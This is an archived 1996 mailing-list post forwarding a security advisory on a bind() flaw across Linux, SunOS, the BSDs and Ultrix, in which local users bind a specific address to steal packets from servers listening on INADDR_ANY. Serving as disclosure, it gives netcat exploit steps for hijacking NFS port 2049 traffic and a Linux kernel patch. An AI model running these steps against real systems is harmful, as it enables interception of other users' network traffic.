[prev in list] [next in list] [prev in thread] [next in thread]
List: freebsd-hackers
Subject: bind() bug in almost all OS'es
From: guido () gvr ! win ! tue ! nl (Guido van Rooij)
Date: 1996-01-31 22:14:58
[Download RAW message or body]
I posted this on secuirty. This is severe in my eyes.
Fortunately there is still the concept of reserved ports but
it does not help sniffing nfs ports :-(
-Guido
Aleph's K-Rad GECOS Field wrote:
> From owner-freebsd-security@freefall.freebsd.org Wed Jan 31 16:00:48 1996
> X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
> Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
> From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org>
> To: linux-security@tarsier.cv.nrao.edu
> cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
> best-of-security@suburbia.net
> Subject: BoS: bind() Security Problems
> Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: nobody@mail.uu.net
> Sender: owner-security@FreeBSD.org
> Precedence: bulk
>
>
> System Call: bind()
> Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
> Probably others.
> Requirement: account on system.
> Security Compromise: Stealing packets from
> nfsd, yppasswd, ircd, etc.
> Credits: *Hobbit* <hobbit@avian.org>
> bitblt <bitblt@infosoc.com>
> Aleph One <aleph1@underground.org>
> Synopsis: bind() does not properly check
> to make sure there is not a socket
> already bound to INADDR_ANY on the same
> port when binding to a specific address.
>
> On most systems, a combination of setting the SO_REUSEADDR
> socket option, and a call to bind() allows any process to bind to
> a port to which a previous process has bound width INADDR_ANY. This
> allows a user to bind to the specific address of a server bound to
> INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
> connection.
>
> Exploit:
>
> Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
> Make sure an nfs server is running:
>
> w00p% netstat -a | grep 2049
> udp 0 0 *.2049 *.* LISTEN
>
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
>
> Wait for packets to arrive.
>
> Fix:
>
> Linux: A patch was been sent to Linus and Alan Cox. It should be
> included with 1.3.60. My original patch (included bellow) allows for
> binds from the same uid, as some virtual hosting software like modified
> httpds, and ftpds, may break otherwise.
>
> Alan didnt like this, so all bind to the same port will
> not be allowed in newer kernels. You should be able to easily adapt
> this patch or Alan's patch to 1.2.13 without much trouble.
>
> Others: Pray to your vendors.
>
> --- begin patch ---
>
>
> diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
> --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995
> +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996
> @@ -46,6 +46,8 @@
> * Germano Caronni : Assorted small races.
> * Alan Cox : sendmsg/recvmsg basic support.
> * Alan Cox : Only sendmsg/recvmsg now supported.
> + * Aleph One : Rogue processes could steal packets
> + * from processes bound to INADDR_ANY.
> *
> * This program is free software; you can redistribute it and/or
> * modify it under the terms of the GNU General Public License
> @@ -899,6 +901,12 @@
>
> if (sk2->num != snum)
> continue; /* more than one */
> + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
> + current->euid != sk2->socket->inode->i_uid)
> + {
> + sti();
> + return(-EADDRINUSE);
> + }
> if (sk2->rcv_saddr != sk->rcv_saddr)
> continue; /* socket per slot ! -FB */
> if (!sk2->reuse || sk2->state==TCP_LISTEN)
>
>
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>
>
>
>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic